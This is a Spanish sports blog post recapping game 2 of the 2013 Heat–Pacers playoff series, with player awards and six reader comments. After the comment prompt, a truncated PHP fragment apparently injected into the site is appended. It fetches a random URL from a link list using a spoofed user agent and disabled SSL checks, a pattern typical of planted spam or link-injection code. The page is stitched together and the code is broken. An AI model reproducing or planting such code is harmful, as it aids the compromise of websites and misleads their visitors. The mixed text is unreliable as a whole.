La Crónica: Sobre tus hombros cimentaré la victoria

25 de May de 2013 por txusma

Un monumento. La serie entre Heat y Pacers va camino de convertirse en un clásico que revisionar en años venideros. Si el primer partido ya fue emocionante y disputado, el segundo no se quedó atrás y nos ofreció todo lo que le podemos pedir a un partido de baloncesto.

Durante la primera parte los Heat fueron siempre haciendo la goma, una situación muy característica en ellos esta temporada. Roy Hibbert martilleó la zona de Miami una y otra, demostrando que es el jugador que más puede marcar las diferencias entre uno y otro equipo. Acabó la 1ª parte con 19 puntos y una superioridad aplastante sobre los interiores de los Heat. En el tercer cuarto, los Heat consiguieron empatar en 3 ocasiones pero los Pacers siempre encontraron la manera de responder y mantenerse por delante. Lebron James se había puesto en modo serio y Paul George conseguía mantenerle el pulso. Quedan para el recuerdo los últimos 10 segundo del final del tercer cuarto, con un mate espectacular de George sobre Chris Andersen y un triple desde su casa de LeBron James que dejaba a Indiana solo 2 puntos arriba. 

A mitad del último cuarto, los Heat se habían escapado por 4 puntos y todo hacía pensar que se llevarían el partido de la misma manera que lo han venido haciendo durante toda la temporada. Sin embargo, la reacción de los Pacers fue fulgurante: triple de Stephenson y nueva canasta de Hibbert. Dos asistencias de Paul George permitieron a West y Hibbert anotar y se llegó a los 50 segundos con los Pacers dos arriba en el marcador y pelota para Miami. LeBron James conduce la pelota y, tras recibir un bloqueo, pasa el balón a Ray Allen. David West, de espaldas al balón, alza los brazos, intercepta el pase y se hace con la pelota. Indiana no es capaz de anotar y la pelota vuelve a estar en poder de LeBron a falta de 15 segundos y con los Heat todavía 2 abajo. Intenta penetrar ante la defensa de Paul George, pero esta vez se encuentra con Roy Hibbert (esta vez sí), que le barra el paso, y acaba perdiendo el balón. Dos pérdidas en los últimos segundos de LeBron James, que había anotado 36 puntos, enterraron las opciones de los Heat y dieron la victoria a los Pacers.

La serie vuela a Indiana empatada y con las espadas en todo lo alto. Los partidos son igualadísimos y se puede dar cualquier resultado. Nadie es favorito.

PREMIOS

MVP: Roy Hibbert explotó una y otra vez el punto débil de los Heat. Acabó con 29 puntos (10 de 15 en tiros de campo) y 10 rebotes.

Sorpresa: Lance Stephenson sigue confirmándose como la sorpresa de la serie. Sus números fueron muy completos (10-8-5) pero destaca sobre todo un triple clave en el último cuarto.

Decepción: Segundo partido consecutivo que se queda Shane Battier sin anotar tiros de campo y ya acumula un 0 de 7.

Esfuerzo en vano: A pesar de las dos pérdidas en los segundos finales, los 36 puntos, 8 rebotes, 3 asistencias y 3 robos de LeBron James fueron la principal resistencia que encontraron los Pacers.

HIGHLIGHTS

Imágenes | AP Photos / Getty Images

Comenta

6 comentarios a esta entrada

  1. GreenPride dice:
    #1

    De nuevo partidazo en Miami. Los Pacers me están sorprendiendo gratamente y parecen dispuestos a disputar las series hasta sus últimas consecuencias. En realidad durante estos dos primeros encuentros han llevado la iniciativa la mayoría del tiempo y sólo un gran LeBron está haciendo que no se estén llevando los partidos más claramente.
    En este segundo los de Indiana marcaron de inicio el ritmo con el mismo guión del primer partido más acentuado aún. Hibbert y West haciendo polvo a los Heat por dentro y los de Miami sobreviviendo a duras penas sobre los hombros del rey.
    En el tercer y último cuarto los Heat fueron apretando las clavijas defensivas a los Pacers y consiguieron cogerlos con un Bosh muy entonado y Wade anotando bastante incluso algunas suspensiones varias veces pero siempre había una respuesta por parte de Indiana con un Paul George que empezaba a tomar el mando
    Finalmente un nuevo arreón en el último cuarto puso 4 arriba a Miami y todos creímos que iban a volver a ganar viniendo de atrás. Sin embargo, este equipo de Indiana parece convencido de que puede hacerse con la victoria y rápidamente un triple de Stephenson y una de dos de Hibbert les devuelven la delantera.
    Y ahí llegamos de nuevo a un final igualado, esta vez sí con Hibbert en cancha.
    Con empate a 93 en el último minuto una falta sobre Hill de Chalmers que pone 2 arriba a Indiana, pérdida de LeBron pero los Pacers se lían y no consiguen lanzar. A 17 segundos bola para el Rey. Esta vez George no se precipita y Hibbert ayuda a tiempo y de nuevo West corta el pase para decidir el partido.
    Indiana vuelve a casa con la creciente sensación de que tienen posibilidades de dar la gran sorpresa ante los campeones. Queda mucha tela que cortar en la eliminatoria pero desde luego que los Heat tendrán que sudar mucho para acabar con ellos.

      Citar

  2. MagicJohnson32 dice:
    #2

    Sensacional partido. Yo los esperaba muy igualados pero mucho más feos, que es lo que me temo que pasará en Indiana. Pero anoche, buenos porcentajes, jugadones de ambos (¡¡qué mate de George, madre del amor hermoso!!), lo tuvo todo.

    Un par de apuntes para completar todo lo dicho:

    – Stephenson bien, sí, pero en el tramo final lo suyo es una metida de pata tras otra salvo en ese triple tan importante cuando los Heat se ponen 4 arriba. Su problema es que se viene muy arriba, jeje, y empieza perder balones y a tirarse fadeaways que resultan en airballs. Va a tener que ser capaz de mantener la cabeza fría, los Pacers le necesitan porque la alternativa parece que es Sam Young, y es muy malo.
    – El ritmo de los partidos es totalmente de los Pacers cuando Hibbert está en pista. Cada vez me cuesta más entender lo que intentó Vogel al final del game 1.

      Citar

  3. rumbero dice:
    #3

    De momento una serie de la leche. Este es el Hibbert que puede hacer verdadero daño. Indiana ha demostrado que tiene las armas para dar el susto y lo está haciendo realmente bien insistiendo por dentro y con su habitual defensa, falta ver como responde Miami que esta notando que los secundarios de turno no meten una y Lebron solo no siempre les va a poder salvar (o si)
    Una vez más me quito el sombrero con George. Un escándalo. Si es que se ve que James se lo pasa teta “picándose” con él. Y Stephenson bien, pero tuvo unos minutos en el último minuto que a punto estuvo de perder el partido él solito. Muy muy buenas finales

      Citar

  4. Jose Luis dice:
    #4

    Grande el “ball don’t lie!” de Brian Shaw cuando Allen falla la técnica xD

      Citar

  5. Jose Luis dice:
    #5

    Wow el mate de George!

      Citar

  6. MagicJohnson32 dice:
    #6

    Jose Luis:
    Wow el mate de George!

    Me levantó de la silla, qué pasada.
    Para quien no lo haya visto, el vídeo: http://blog.tjnba.com/2013/05/25/paul-george-machaca-sobre-chris-andersen/
    El GIF: http://twitpic.com/ct48rl

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>